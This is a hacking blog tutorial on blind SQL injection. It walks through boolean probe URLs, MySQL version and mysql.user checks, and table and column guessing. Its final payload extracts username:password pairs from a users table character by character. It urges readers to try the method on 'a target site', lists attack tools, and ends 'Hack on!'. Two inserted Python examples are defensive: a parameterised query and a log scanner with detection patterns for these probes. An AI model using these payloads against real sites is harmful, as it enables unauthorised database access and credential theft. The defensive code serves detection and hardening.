Welcome all! This is part 4 out of a series!

For this tutorial we will be talking about blind SQL injection.

+———————-+

|Checking for injection|

+———————-+

Let’s get right into it with how to check for blind SQL injection. The method is different from normal SQL injection, so try both on a target site!

http://www.site.com/news.php?id=5

The above link will load a page with some media and stuff…

http://www.site.com/news.php?id=5 and 1=1

This link will show the same media because 1=1 is true.

http://www.site.com/news.php?id=5 and 1=2

Now when this link is requested, some media will disappear and things will stop working. If the statement above makes things stop showing or working, then the site is vulnerable.
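To show why the 1=1 / 1=2 pair works as an oracle, here is an added example (not code from the original tutorial) that models news.php with an in-memory SQLite table standing in for the site's MySQL table. The vulnerable handler pastes the id parameter into the query, the hardened handler validates and binds it, and a small check reports whether a handler behaves differently for the two probes.

```python
import sqlite3

# Constructed stand-in for the table behind news.php (not a real site).
_DB = sqlite3.connect(":memory:")
_DB.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
_DB.execute("INSERT INTO news VALUES (5, 'Site news item five')")
_DB.commit()


def news_vulnerable(id_param: str):
    """The pattern the tutorial exploits: the ?id= value is concatenated
    into the SQL, so 'and 1=1' / 'and 1=2' become part of the WHERE clause
    and the page content turns into a true/false oracle."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    return _DB.execute(sql).fetchall()


def news_safe(id_param: str):
    """Hardened form: require a plain integer and bind it as a parameter.
    Anything else is rejected before it reaches the database, so there is
    no condition for an attacker to toggle."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT title FROM news WHERE id=?"
    return _DB.execute(sql, (int(id_param),)).fetchall()


def is_boolean_oracle(lookup) -> bool:
    """Does the handler answer differently for 'and 1=1' and 'and 1=2'?
    A difference means the injected condition is being evaluated."""
    try:
        true_case = lookup("5 and 1=1")
        false_case = lookup("5 and 1=2")
    except ValueError:
        return False  # input rejected outright: nothing to probe
    return true_case != false_case
```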

+—————-+

|Checking version|

+—————-+

To find the version of a vulnerable site we use this SQL:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

If the URL above returns true then it is version four; if the URL below turns up as true, we know it is version five:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

+—————————————-+

|Checking what commands we have access to|

+—————————————-+

Next we need to find what functions we have access to. First we want to check whether we can use select:

http://www.site.com/news.php?id=5 and (select 1)=1

If the page above loads normally then we can use select. Next we check whether we have access to mysql.user:

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally then once again we have access. If you don’t have access to either of these commands, it will make life easier. I will cover how to get around using the commands in a later tutorial!

+——————————+

|Getting table and column names|

+——————————+

This is where you need to use your guessing powers. The SQL below will check whether the table ‘users’ exists. Remember: if content loads = true; if it doesn’t = false.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

You have to have the limit in there because the comparison only works when the select returns one row at a time.

Once you have found a table you need to get the columns. Again, this is trial and error. If we have the table users, the injection below will check whether the column “password” exists:

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

A lot, right? Now that you have the tables and columns you need, let’s get the data.

+—————–+

|Gettin’ ‘dat data|

+—————–+

I am warning you this part is really annoying and complicated!

So what you have to do is first insert the table and column names into the SQL statement below:

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

At the end is the number 80; this represents an ASCII value. You can find an ASCII chart here: http://www.asciitable.com/

We are going to have to increase the number at the far right until we get false. Once we get false, the number under that is the first ASCII value of that data.

After you get one letter, increase the substring position from 1,1 to 2,1 to 3,1 etc. Letter by letter you will get the data.

Since this is so slow most people use SQL injection tools to make it go faster!
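The same slowness that pushes people toward tools is what makes this technique visible on the server side: one client sends many near-identical requests to news.php that differ only in the comparison value. The following is an added example, not from the original tutorial, that scans constructed access-log lines (modelled on the probes in the "Checking for injection", "Checking version" and data-extraction sections) and counts per client which probe shapes appear.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines (not from any real server): a 1=1/1=2 check, a
# version probe, then the start of a character-by-character extraction.
SAMPLE_LOG = """\
10.0.0.7 "GET /news.php?id=5 HTTP/1.1" 200
10.0.0.7 "GET /news.php?id=5+and+1%3D1 HTTP/1.1" 200
10.0.0.7 "GET /news.php?id=5+and+1%3D2 HTTP/1.1" 200
10.0.0.7 "GET /news.php?id=5+and+substring(@@version,1,1)%3D5 HTTP/1.1" 200
10.0.0.7 "GET /news.php?id=5+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+limit+0,1),1,1))>80 HTTP/1.1" 200
10.0.0.7 "GET /news.php?id=5+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+limit+0,1),1,1))>90 HTTP/1.1" 200
10.0.0.7 "GET /news.php?id=5+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+limit+0,1),1,1))>100 HTTP/1.1" 200
10.0.0.9 "GET /news.php?id=7 HTTP/1.1" 200
"""

# Signatures derived from the payload shapes shown in this tutorial.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I),
    "version_probe": re.compile(r"substring\s*\(\s*@@version", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "mysql_user": re.compile(r"from\s+mysql\.user", re.I),
}

LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3})')


def classify_request(line: str):
    """Return (client, decoded path, set of matched signature names)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, raw_path, _status = m.groups()
    path = unquote_plus(raw_path)  # undo '+' and %3D before matching
    hits = {name for name, rx in SIGNATURES.items() if rx.search(path)}
    return client, path, hits


def scan_log(text: str):
    """Count signature hits per client. Repeated char_extraction hits from
    one client mean a column is being read out one byte at a time."""
    per_client = defaultdict(lambda: defaultdict(int))
    for line in text.splitlines():
        parsed = classify_request(line)
        if parsed is None:
            continue
        client, _path, hits = parsed
        for name in hits:
            per_client[client][name] += 1
    return {c: dict(counts) for c, counts in per_client.items()}
```

Clients with zero hits (10.0.0.9 above) are left out of the result, so the output lists only the sources worth a closer look.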

+——————-+

|SQL Injection Tools|

+——————-+

I might give a tutorial on one of these later, but here is a list with pros and cons of the main tools used:

sqlmap – really easy and pretty fast, not really any cons

sqlninja – self-explanatory but pretty slow

Havij – uses Google Dorks and has a nice output format

SQLsus – super fast but hard to use overall

The Mole – simple and not a lot to it, limited options

+—————–+

|Hope you enjoyed!|

+—————–+

Hope you enjoyed this tutorial! It took a long time but I hope you guys learned from it!

Next tutorial will be about making our own SQL injection tool!

Hack on!

6 COMMENTS

  1. Hey there would you mind letting me know which hosting company you’re using?
    I’ve loaded your blog in 3 completely different browsers and I must say this blog loads a lot faster than most.
    Can you recommend a good internet hosting provider at
    a reasonable price? Kudos, I appreciate it!

    • Hey Joanna, blogs are hosted for free at WordPress.com. It applies for me too. And I’m happy that the site loads fast, thereby making it flexible for visitors. I’ll recommend Bluehost for hosting purposes, as it is also officially supported by WordPress.
      Which hosting provider are you using, by the way?
